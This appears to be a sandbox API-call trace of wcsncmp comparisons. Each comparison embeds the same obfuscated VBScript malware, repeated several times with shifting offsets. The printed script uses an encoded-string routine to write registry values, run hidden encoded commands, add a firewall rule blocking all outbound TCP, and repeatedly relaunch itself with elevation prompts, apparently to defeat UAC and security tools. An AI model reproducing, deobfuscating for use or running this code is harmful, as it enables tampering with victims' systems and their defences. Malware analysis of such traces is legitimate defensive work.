bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 67 [0223.030] wcsncmp (_String1="rotocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0223.030] wcsncmp (_String1="otocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0223.030] wcsncmp (_String1="tocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0223.031] wcsncmp (_String1="ocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0223.031] wcsncmp (_String1="col = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, 